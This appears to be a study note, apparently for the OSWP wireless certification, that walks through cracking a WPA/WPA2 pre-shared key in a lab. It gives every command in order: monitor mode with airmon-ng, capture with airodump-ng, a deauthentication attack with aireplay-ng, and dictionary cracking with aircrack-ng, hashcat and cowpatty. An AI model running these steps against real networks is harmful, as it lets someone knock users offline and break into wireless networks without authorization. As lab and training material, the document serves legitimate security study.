WPA/WPA2

Steps to crack the WPA/WPA2 key. We will need a WPA handshake.

1. Monitor mode

First of all check and kill with airmon-ng:

sudo airmon-ng check
sudo airmon-ng check kill

Next, we enable monitor mode:

sudo airmon-ng start wlan0
sudo airmon-ng start wlan0 <channel_id>

2. Finding target

We will now find the bssid (MAC) and essid (SSID) of our target:

sudo airodump-ng wlan0

Example output:

We found our target F0:A7:31:46:69:71 and see its using WPA2 PSK auth. We can also see its on channel 1.

3. Dumping & getting handshake

sudo airodump-ng -c 1 -w wpa2 --bssid F0:A7:31:46:69:71 wlan0

-c | channel to 1

-w for write output as wpa2

--bssid for target MAC

wlan 0 our monitor interface

We will now have to wait for a client to connect to the network or inject using a deauthorization attack. We can see one station (client) is connected 8C:EC:7B:0F:63:24.

4. Re-authentication attack

We use ‘aireplay-ng’ which is an injection attack. This forces a re-authentication packet into the wire.

┌──(kali㉿kali)-[~/offsec/oswp]
└─$ sudo aireplay-ng -0 1 -a F0:A7:31:46:69:71 -c 8C:EC:7B:0F:63:24 wlan0
13:38:20  Waiting for beacon frame (BSSID: F0:A7:31:46:69:71) on channel 1
13:38:21  Sending 64 directed DeAuth (code 7). STMAC: [8C:EC:7B:0F:63:24] [ 0| 0 ACKs]

After that we can see "WPA handshake: X" status:

We now have captured a handshake in the .cap file. We can now use aircrack to crack the PSK.

5. Cracking

Now we will run ‘aircrack-ng’ against the dump file we gathered earlier.

aircrack-ng -w list.txt  -e OSWP -b F0:A7:31:46:69:71 wpa2-01.cap

With hashcat

Convert cap to hashcat hash mode 22000

hcxpcapngtool -o hash.hc22000 -E wordlist wpa2-01.cap

Crack it

hashcat -m 22000 hash.hc22000 list.txt

With cowpatty

First generate list of hashes:

genpmk -f list.txt -d oswphashes -s OSWP

Then crack it:

cowpatty -r wpa2-01.cap -d oswphashes -s OSWP